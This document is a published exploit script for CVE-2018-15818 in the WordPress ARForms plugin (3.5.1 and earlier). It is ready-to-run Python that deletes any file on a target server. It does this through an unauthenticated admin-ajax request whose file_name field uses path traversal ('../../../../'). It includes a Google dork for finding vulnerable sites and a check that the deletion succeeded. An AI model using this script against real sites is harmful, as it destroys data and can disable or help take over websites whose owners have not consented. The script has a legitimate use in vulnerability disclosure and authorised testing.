WordPress Arforms 3.5.1 Arbitrary File Delete Exploit

# Exploit Title: WordPress Plugin Arforms 3.5.1 - Delete arbitrary file
# Google Dork: /plugins/arforms/
# Exploit Author: Amir Hossein Mahboubi
# Twitter: @Mahboubi66
# Vendor Homepage: https://www.arformsplugin.com/
# Version: <=3.5.1
# Tested on: Linux & Windows
# CVE : CVE-2018-15818

#!/usr/bin/python
import requests
import sys

headers = {
  "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0",
  "Accept": "*/*",
  "Accept-Language": "en-US,en;q=0.5",
  "Accept-Encoding": "gzip, deflate",
  "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
  "X-Requested-With": "XMLHttpRequest",
  "Connection": "close"
  }
  
print "\n"  
if(len(sys.argv)<3):
  print "Please enter WP URL as first argument and file address that you want to delete as second one\n\
for example if WP is installed in the root directory of www.example.com and we want to delete index.php\n\
the exploit format should be: python arforms.py www.example.com index.php"
  exit()

r = requests.get(sys.argv[1]+sys.argv[2], headers=headers)
if(r.status_code==404):
  print "The specified file doesn't exist on the host"
  exit()
  
  
url = sys.argv[1]+'/wp-admin/admin-ajax.php'

payload = {
  "action":"arf_delete_file",
  "file_name":"../../../../"+sys.argv[2]
  }


r = requests.post(url, data=payload, headers=headers)
if(r.status_code!=200):
  print "The specified URL is not a wordpress installation or the plugin isn't installed"
else:
  r = requests.get(sys.argv[1]+sys.argv[2], headers=headers)
  if(r.status_code!=200):
    print "Operation completed"
  else:
    print "The target isn't vulnerable"

#  0day.today [2018-10-28]  #